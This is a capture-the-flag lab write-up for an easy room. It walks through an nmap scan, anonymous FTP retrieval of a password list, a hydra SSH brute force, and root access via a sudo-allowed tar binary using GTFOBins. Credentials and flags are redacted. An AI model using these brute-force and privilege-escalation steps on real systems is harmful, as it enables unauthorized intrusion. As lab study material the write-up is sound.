πŸ’­ Thoughts after doing the room

This room was a little bit odd because I didn’t really get the L (O)MEGALUL RE. The contents of the http server didn’t play any role in the further process. Sometimes the rooms labeled as easy already require a lot of knowledge, but this one was really on the easier side.

Task 1 Living up to the title

Deploy the machine.


Find open ports on the machine

Default ports nmap fast scan

root@ip-10-10-24-237:~# IP=
root@ip-10-10-24-237:~# nmap -T4 $IP

Starting Nmap 7.60 ( ) at 2023-03-29 20:27 BST
Nmap scan report for (
Host is up (0.00033s latency).
Not shown: 967 filtered ports, 30 closed ports
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:CF:B3:AC:55:A7 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 16.16 seconds

Who wrote the task list?

Port 80 was open so I check if there is a website, which doesn’t reveal something directly as far as I can tell.

FTP port was also open. Check for anonymous FTP login

Download both files there

root@ip-10-10-24-237:~# ftp $IP
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
226 Transfer complete.
418 bytes received in 0.08 secs (5.4071 kB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.00 secs (120.0836 kB/s)
ftp> exit
221 Goodbye.

locks.txt seems to contain passwords

root@ip-10-10-24-237:~# cat locks.txt 

task.txt has two lines and a name we’re looking for

root@ip-10-10-24-237:~# cat task.txt 
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.


What service can you bruteforce with the text file found?

Because of the question I’m thinking more ssh than the webserver. So I’ll try it with the new name we got and the password list.

What is the users password?

I accidentally first copied over the hydra command with the RockYou wordlist instead of the password file we found, this there is an output about a previous session.

root@ip-10-10-24-237:~# hydra -l 🀐 -P locks.txt $IP ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2023-03-29 20:37:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: 🀐   password: 🀐
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra ( finished at 2023-03-29 20:38:04


It’s just in the directory when you login

🀐@bountyhacker:~/Desktop$ ls
🀐@bountyhacker:~/Desktop$ cat user.txt 


One of the first things I check manually is sudo -l to see if I can run anything as root.

🀐@bountyhacker:~/Desktop$ sudo -l
[sudo] password for 🀐: 
Matching Defaults entries for 🀐 on bountyhacker:
    env_reset, mail_badpass,

User 🀐 may run the following commands on bountyhacker:
    (root) /bin/🀐

Yes. There is one. So I go to gtfobins and check the command for elevated privileges

🀐@bountyhacker:~/Desktop$ sudo 🀐 
tar: Removing leading `/' from member names
# whoami
# cd /root 
# ls
# cat root.txt